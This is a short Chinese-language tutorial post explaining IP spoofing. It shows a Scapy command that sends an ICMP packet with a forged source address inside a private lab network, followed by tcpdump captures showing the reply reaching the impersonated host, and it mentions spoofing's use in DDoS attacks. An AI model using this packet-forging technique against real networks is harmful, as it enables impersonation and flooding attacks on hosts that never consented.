IP欺骗

IP欺骗就比较直接,恶意机器伪装成其它主机IP地址

攻击机器通过发送伪装了IP地址的数据包,那么收到了伪造包得主机,就会向特定的机器响应返回,这样就可以在该机器截取信息;但更多的时候,攻击者不关心返回,伪造大量IP是为了进行对特定机器进行DDOS攻击

下面是通过发送伪造了IP地址的包,来获取响应报文到特定机器

1:恶意机器,发送一个伪装成SRC IP为35的ICMP包

>>> from scapy.all import *
>>> packet = IP(src = '10.8.165.35', dst = '10.8.165.37')/ICMP()
>>> send(packet, iface = 'eth1')
.
Sent 1 packets.

2:接收端DST IP所在的主机,接收到了request,并返回reply给了35

# tcpdump -i eth1 icmp -en
11:10:09.894625 fa:16:3e:40:b3:ac > fa:16:3e:05:94:c9, ethertype IPv4 (0x0800), length 60: 10.8.165.35 > 10.8.165.37: ICMP echo request, id 0, seq 0, length 8
11:10:09.894683 fa:16:3e:05:94:c9 > fa:16:3e:9a:2c:3a, ethertype IPv4 (0x0800), length 42: 10.8.165.37 > 10.8.165.35: ICMP echo reply, id 0, seq 0, length 8

3:伪装成35的恶意机器,只有最开始发出去的request包

# tcpdump -i eth1 icmp -en
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes
11:10:09.881287 fa:16:3e:40:b3:ac > fa:16:3e:05:94:c9, ethertype IPv4 (0x0800), length 42: 10.8.165.35 > 10.8.165.37: ICMP echo request, id 0, seq 0, length 8

4:真正的35,收到了这个reply

# tcpdump -i eth1 icmp -en
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes
11:10:09.876541 fa:16:3e:05:94:c9 > fa:16:3e:9a:2c:3a, ethertype IPv4 (0x0800), length 60: 10.8.165.37 > 10.8.165.35: ICMP echo reply, id 0, seq 0, length 8

发表评论